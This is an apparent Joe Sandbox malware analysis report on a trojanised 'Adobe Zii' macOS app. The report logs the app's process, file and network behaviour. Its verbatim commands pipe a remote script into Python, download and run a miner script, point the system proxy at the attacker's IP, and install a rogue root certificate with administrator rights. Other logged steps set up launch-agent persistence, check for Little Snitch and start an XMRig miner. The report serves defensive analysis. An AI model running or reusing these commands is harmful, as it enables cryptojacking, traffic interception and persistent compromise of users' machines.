
Analysis Report TnrhsyteX1

Overview

General Information

Joe Sandbox Version: 25.0.0 Fire Opal
Analysis ID: 65439
Start date: 10.12.2018
Start time: 11:17:39
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 5m 7s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: TnrhsyteX1 (renamed file extension from none to app)
Cookbook file name: defaultmacfilecookbook.jbs
Analysis system description: Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection: MAL
Classification: mal80.troj.evad.mine.macAPP@0/136@2/0
Warnings:
  • Report size exceeded maximum capacity and may have missing behavior information.

Detection

Strategy | Score | Range | Reporting | Detection
Threshold | 80 | 0 - 100 | Report FP / FN | malicious

Classification

MITRE ATT&CK Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control
Valid Accounts | AppleScript (3) | Hidden Files and Directories (1) | Launch Daemon (1) | Hidden Files and Directories (1) | Credential Dumping | Process Discovery (11) | AppleScript (3) | Data from Local System | Data Encrypted (2) | Uncommonly Used Port (2)
Replication Through Removable Media | Scripting (21) | Launch Agent (1) | Accessibility Features | Scripting (21) | Network Sniffing | System Information Discovery (31) | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Standard Cryptographic Protocol (1)
Drive-by Compromise | User Execution (1) | Launch Daemon (1) | Path Interception | File Deletion (1) | Input Capture | Query Registry | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Non-Application Layer Protocol (5)
Exploit Public-Facing Application | Scheduled Task | System Firmware | DLL Search Order Hijacking | Code Signing (1) | Credentials in Files | System Network Configuration Discovery | Logon Scripts | Input Capture | Data Encrypted | Standard Application Layer Protocol (15)

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: /Users/Shared/xmrig | Avira: Label: PUA/OSX.CoinMiner.kaotz
Imports the Security library (often used for certificate, key, keychain, or secure transport handling)
Source: initial sample | Static MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Bitcoin Miner:

Detected Stratum mining protocol
Source: global traffic | TCP traffic: 192.168.0.50:49249 -> 37.187.163.200:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42b3n6qxhhyfofahm3bwfuetgewht16f7em7mzxcfxo66jtfsfzcpkm6uabw4dxpqievd4bp51pglsd8rqzfjc3dtsu5vcf","pass":"monerominer12343:goodnews420@yandex.com","agent":"xmrig/2.8.3 (macintosh; intel mac os x) libuv/1.24.0 clang/9.1.0","algo":["cn","cn/2","cn/1","cn/0","cn/xtl","cn/msr","cn/xao","cn/rto"]}}
Source: global traffic | TCP traffic: 192.168.0.50:49257 -> 37.187.163.200:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42b3n6qxhhyfofahm3bwfuetgewht16f7em7mzxcfxo66jtfsfzcpkm6uabw4dxpqievd4bp51pglsd8rqzfjc3dtsu5vcf","pass":"monerominer12343:goodnews420@yandex.com","agent":"xmrig/2.8.3 (macintosh; intel mac os x) libuv/1.24.0 clang/9.1.0","algo":["cn","cn/2","cn/1","cn/0","cn/xtl","cn/msr","cn/xao","cn/rto"]}}

Networking:

Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.0.50:49236 -> 46.226.108.171:4444
Source: global traffic | TCP traffic: 192.168.0.50:49249 -> 37.187.163.200:3333
Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 49236 -> 4444
Source: unknown | Network traffic detected: HTTP traffic on port 4444 -> 49236
Source: unknown | Network traffic detected: HTTP traffic on port 49237 -> 4444
Source: unknown | Network traffic detected: HTTP traffic on port 4444 -> 49237
Source: unknown | Network traffic detected: HTTP traffic on port 49238 -> 4444
Source: unknown | Network traffic detected: HTTP traffic on port 4444 -> 49238
Source: unknown | Network traffic detected: HTTP traffic on port 49239 -> 4444
Source: unknown | Network traffic detected: HTTP traffic on port 4444 -> 49239
Source: unknown | Network traffic detected: HTTP traffic on port 49246 -> 4444
Source: unknown | Network traffic detected: HTTP traffic on port 4444 -> 49246
Source: unknown | Network traffic detected: HTTP traffic on port 49247 -> 4444
Source: unknown | Network traffic detected: HTTP traffic on port 4444 -> 49247
Source: unknown | Network traffic detected: HTTP traffic on port 49248 -> 4444
Source: unknown | Network traffic detected: HTTP traffic on port 4444 -> 49248
Source: unknown | Network traffic detected: HTTP traffic on port 49250 -> 4444
Source: unknown | Network traffic detected: HTTP traffic on port 4444 -> 49250
Writes shell scripts with functionality to modify network settings
Source: /usr/bin/curl (PID: 560) | File written: /private/tmp/uploadminer.sh
Source: /usr/bin/curl (PID: 596) | File written: /private/tmp/uploadminer.sh
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171
Executes the "networksetup" command used to configure network settings
Source: /bin/sh (PID: 567) | Networksetup executable: /usr/sbin/networksetup -> networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080
Source: /bin/sh (PID: 569) | Networksetup executable: /usr/sbin/networksetup -> networksetup -setwebproxy Wi-Fi 46.226.108.171 8080
Source: /bin/sh (PID: 603) | Networksetup executable: /usr/sbin/networksetup -> networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080
Source: /bin/sh (PID: 605) | Networksetup executable: /usr/sbin/networksetup -> networksetup -setwebproxy Wi-Fi 46.226.108.171 8080
Downloads compressed data via HTTP
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 200 OK
    Date: Mon, 10 Dec 2018 10:18:52 GMT
    Server: Apache/2.4.18 (Ubuntu)
    Last-Modified: Wed, 07 Nov 2018 12:14:18 GMT
    ETag: "6a815e-57a120ebaeeee"
    Accept-Ranges: bytes
    Content-Length: 6979934
    Content-Type: application/zip
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected:
    GET /sample.zip HTTP/1.1
    Host: 46.226.108.171
    User-Agent: curl/7.54.0
    Accept: */*
Source: global traffic | HTTP traffic detected:
    GET /login/process.php HTTP/1.1
    Accept-Encoding: identity
    Host: 46.226.108.171:4444
    Cookie: session=Uy3r/62UwT8t7hOk1wN8uCOC4Vk=
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic | HTTP traffic detected:
    GET /news.php HTTP/1.1
    Accept-Encoding: identity
    Host: 46.226.108.171:4444
    Cookie: session=FG19agq3LNl5N2MHdDr0MRKAZ24=
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic | HTTP traffic detected:
    GET /uploadminer.sh HTTP/1.1
    Host: 46.226.108.171
    User-Agent: curl/7.54.0
    Accept: */*
Source: global traffic | HTTP traffic detected:
    GET /com.apple.rig.plist HTTP/1.1
    Host: 46.226.108.171
    User-Agent: curl/7.54.0
    Accept: */*
Source: global traffic | HTTP traffic detected:
    GET /com.proxy.initialize.plist HTTP/1.1
    Host: 46.226.108.171
    User-Agent: curl/7.54.0
    Accept: */*
Source: global traffic | HTTP traffic detected:
    GET /config.json HTTP/1.1
    Host: 46.226.108.171
    User-Agent: curl/7.54.0
    Accept: */*
Source: global traffic | HTTP traffic detected:
    GET /xmrig HTTP/1.1
    Host: 46.226.108.171
    User-Agent: curl/7.54.0
    Accept: */*
Source: global traffic | HTTP traffic detected:
    GET /news.php HTTP/1.1
    Accept-Encoding: identity
    Host: 46.226.108.171:4444
    Cookie: session=SYDFioywtcFbUR5U3EST96SbqVk=
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic | HTTP traffic detected:
    GET /admin/get.php HTTP/1.1
    Accept-Encoding: identity
    Host: 46.226.108.171:4444
    Cookie: session=hbR4wlsbQec60C56VlkryZf6BKM=
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: ptpb.pw
Posts data to webserver
Source: unknown | HTTP traffic detected:
    POST /admin/get.php HTTP/1.1
    Accept-Encoding: identity
    Content-Length: 1902
    Host: 46.226.108.171:4444
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Reads from file descriptors related to (network) sockets
Source: /usr/bin/curl (PID: 549) | Reads from socket in process: data
Source: /Users/Shared/./xmrig (PID: 593) | Reads from socket in process: data
Source: /Users/Shared/./xmrig (PID: 617) | Reads from socket in process: data
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49235
Source: unknown | Network traffic detected: HTTP traffic on port 49235 -> 443
Writes from file descriptors related to (network) sockets
Source: /usr/bin/curl (PID: 549) | Writes from socket in process: data
Source: /Users/Shared/./xmrig (PID: 593) | Writes from socket in process: data
Source: /Users/Shared/./xmrig (PID: 617) | Writes from socket in process: data

System Summary:

Classification label
Source: classification engine | Classification label: mal80.troj.evad.mine.macAPP@0/136@2/0

Data Obfuscation:

Imports the Security library (often used for certificate, key, keychain, or secure transport handling)
Source: initial sample | Static MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Persistence and Installation Behavior:

Executes the "rm" command used to delete files or directories
Source: /bin/sh (PID: 590) | Rm executable: /bin/rm -> rm -rf ./xmrig2
Source: /bin/sh (PID: 591) | Rm executable: /bin/rm -> rm -rf ./config2.json
Source: /bin/sh (PID: 615) | Rm executable: /bin/rm -> rm -rf ./xmrig2
Source: /bin/sh (PID: 616) | Rm executable: /bin/rm -> rm -rf ./config2.json
Many shell processes execute programs via execve syscall (may be indicative of malicious behavior)
Source: /bin/sh (PID: 554) | Shell process: ps -ef
Source: /bin/sh (PID: 555) | Shell process: grep Little Snitch
Source: /bin/sh (PID: 556) | Shell process: grep -v grep
Source: /bin/sh (PID: 557) | Shell process: id -u
Source: /bin/sh (PID: 558) | Shell process: ps 550
Source: /bin/sh (PID: 560) | Shell process: curl -o uploadminer.sh http://46.226.108.171/uploadminer.sh
Source: /bin/sh (PID: 561) | Shell process: chmod +x ./uploadminer.sh
Source: /bin/sh (PID: 563) | Shell process: osascript -e do shell script 'networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 && networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem' with administrator privileges
Source: /bin/sh (PID: 567) | Shell process: networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080
Source: /bin/sh (PID: 568) | Shell process: /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 569) | Shell process: networksetup -setwebproxy Wi-Fi 46.226.108.171 8080
Source: /bin/sh (PID: 570) | Shell process: /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 571) | Shell process: curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem
Source: /bin/sh (PID: 574) | Shell process: curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plist
Source: /bin/sh (PID: 575) | Shell process: curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plist
Source: /bin/sh (PID: 576) | Shell process: launchctl load -w com.apple.rig.plist
Source: /bin/sh (PID: 578) | Shell process: launchctl load -w com.proxy.initialize.plist
Source: /bin/sh (PID: 580) | Shell process: curl -o config.json http://46.226.108.171/config.json
Source: /bin/sh (PID: 581) | Shell process: curl -o xmrig http://46.226.108.171/xmrig
Source: /bin/sh (PID: 589) | Shell process: chmod +x ./xmrig
Source: /bin/sh (PID: 590) | Shell process: rm -rf ./xmrig2
Source: /bin/sh (PID: 591) | Shell process: rm -rf ./config2.json
Source: /bin/sh (PID: 593) | Shell process: ./xmrig -c config.json
Source: /bin/sh (PID: 583) | Shell process: ps -ef
Source: /bin/sh (PID: 584) | Shell process: grep Little Snitch
Source: /bin/sh (PID: 585) | Shell process: grep -v grep
Source: /bin/sh (PID: 587) | Shell process: id -u
Source: /bin/sh (PID: 588) | Shell process: ps 579
Source: /bin/sh (PID: 596) | Shell process: curl -o uploadminer.sh http://46.226.108.171/uploadminer.sh
Source: /bin/sh (PID: 597) | Shell process: chmod +x ./uploadminer.sh
Source: /bin/sh (PID: 599) | Shell process: osascript -e do shell script 'networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 && networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem' with administrator privileges
Source: /bin/sh (PID: 603) | Shell process: networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080
Source: /bin/sh (PID: 604) | Shell process: /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 605) | Shell process: networksetup -setwebproxy Wi-Fi 46.226.108.171 8080
Source: /bin/sh (PID: 606) | Shell process: /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/sh (PID: 607) | Shell process: curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem
Source: /bin/sh (PID: 608) | Shell process: curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plist
Source: /bin/sh (PID: 609) | Shell process: curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plist
Source: /bin/sh (PID: 610) | Shell process: launchctl load -w com.apple.rig.plist
Source: /bin/sh (PID: 611) | Shell process: launchctl load -w com.proxy.initialize.plist
Source: /bin/sh (PID: 612) | Shell process: curl -o config.json http://46.226.108.171/config.json
Source: /bin/sh (PID: 613) | Shell process: curl -o xmrig http://46.226.108.171/xmrig
Source: /bin/sh (PID: 614) | Shell process: chmod +x ./xmrig
Source: /bin/sh (PID: 615) | Shell process: rm -rf ./xmrig2
Source: /bin/sh (PID: 616) | Shell process: rm -rf ./config2.json
Source: /bin/sh (PID: 617) | Shell process: ./xmrig -c config.json
Changes permissions of written Mach-O files
Source: /usr/bin/unzip (PID: 592) | Permissions modified for written 64-bit Mach-O /Users/henry/sample/sample.app/Contents/MacOS/Adobe Zii: bits: - usr: rx grp: rx all: rwx
Source: /usr/bin/unzip (PID: 592) | Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v9.bundle/Versions/A/Resources/libConfigurer.dylib: bits: - usr: rx grp: rx all: rwx
Source: /usr/bin/unzip (PID: 592) | Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v9.bundle/Versions/A/amtlib: bits: - usr: rx grp: rx all: rwx
Source: /usr/bin/unzip (PID: 592) | Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v9ME.bundle/Versions/A/Resources/libConfigurer.dylib: bits: - usr: rx grp: rx all: rwx
Source: /usr/bin/unzip (PID: 592) | Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v9ME.bundle/Versions/A/amtlib: bits: - usr: rx grp: rx all: rwx
Source: /usr/bin/unzip (PID: 592) | Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v10.bundle/Versions/A/Resources/libConfigurer.dylib: bits: - usr: rx grp: rx all: rwx
Source: /usr/bin/unzip (PID: 592) | Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v10.bundle/Versions/A/amtlib: bits: - usr: rx grp: rx all: rwx
Source: /usr/bin/unzip (PID: 592) | Permissions modified for written 64-bit Mach-O /Users/henry/sample/sample.app/Contents/Resources/v10ME.bundle/Versions/A/Resources/libConfigurer.dylib: bits: - usr: rx grp: rx all: rwx
Source: /usr/bin/unzip (PID: 592) | Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v10ME.bundle/Versions/A/amtlib: bits: - usr: rx grp: rx all: rwx
Source: /usr/bin/unzip (PID: 592) | Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v6.bundle/Versions/A/amtlib: bits: - usr: rx grp: rx all: rwx
Creates application bundles
Source: /usr/bin/unzip (PID: 592) | Bundle Info.plist file created: sample/sample.app/Contents/Info.plist
Creates hidden files, links and/or directories
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/MacOS/._Adobe Zii
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/._MacOS
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._AdobeIcon.png
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/._Resources
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/._CodeResources
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/_CodeSignature/._CodeResources
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/.__CodeSignature
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/Resources/._libConfigurer.dylib
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/Resources/._Info.plist
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/._Resources
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/._amtlib
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/._A
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/._Current
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/._Versions
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/._amtlib
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._v9.bundle
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._AppIcon.icns
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/Base.lproj/._MainMenu.nib
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._Base.lproj
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/._Resources
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/A/_CodeSignature/._CodeResources
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/A/.__CodeSignature
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/A/Resources/._libConfigurer.dylib
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/A/Resources/._Info.plist
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/A/._Resources
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/A/._amtlib
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/._A
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/._Current
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/._Versions
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/._amtlib
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._v9ME.bundle
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/._Resources
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/A/_CodeSignature/._CodeResources
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/A/.__CodeSignature
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/A/Resources/._libConfigurer.dylib
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/A/Resources/._Info.plist
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/A/._Resources
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/A/._amtlib
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/._A
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/._Current
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/._Versions
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/._amtlib
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._v10.bundle
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/._Resources
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/A/_CodeSignature/._CodeResources
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/A/.__CodeSignature
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/A/Resources/._libConfigurer.dylib
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/A/Resources/._Info.plist
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/A/._Resources
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/A/._amtlib
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/._A
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/._Current
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/._Versions
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/._amtlib
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._v10ME.bundle
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/._Resources
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/A/._CodeResources
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/A/_CodeSignature/._CodeResources
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/A/.__CodeSignature
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/A/Resources/._Info.plist
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/A/._Resources
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/A/._amtlib
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/._A
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/._CurrentJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/._VersionsJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/._amtlibJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._v6.bundleJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/._ResourcesJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/._Info.plistJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/._PkgInfoJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/._ContentsJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/._sample.appJump to behavior
Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'
Source: /bin/sh (PID: 563) | Osascript command executed: osascript -e do shell script 'networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 && networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem' with administrator privileges
Source: /bin/sh (PID: 599) | Osascript command executed: osascript -e do shell script 'networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 && networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem' with administrator privileges
Executes commands using a shell command-line interpreter
Source: /Users/henry/Desktop/unpack/Adobe Zii.app/Contents/MacOS/Application Stub (PID: 546) | Shell command executed: /bin/bash -c curl https://ptpb.pw/jj9a | python - & s=46.226.108.171:80 curl $s/sample.zip -o sample.zip unzip sample.zip -d sample cd sample cd __MACOSX open -a sample.app -
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550) | Shell command executed: sh -c id -u
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 553) | Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 558) | Shell command executed: /bin/sh -c ps 550
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 559) | Shell command executed: /bin/sh -c cd /tmp && curl -o uploadminer.sh http://46.226.108.171/uploadminer.sh && chmod +x ./uploadminer.sh && ./uploadminer.sh
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 566) | Shell command executed: /bin/sh -c networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 && networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem
Source: /usr/sbin/networksetup (PID: 567) | Shell command executed: sh -c /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 569) | Shell command executed: sh -c /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 579) | Shell command executed: sh -c id -u
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 582) | Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 588) | Shell command executed: /bin/sh -c ps 579
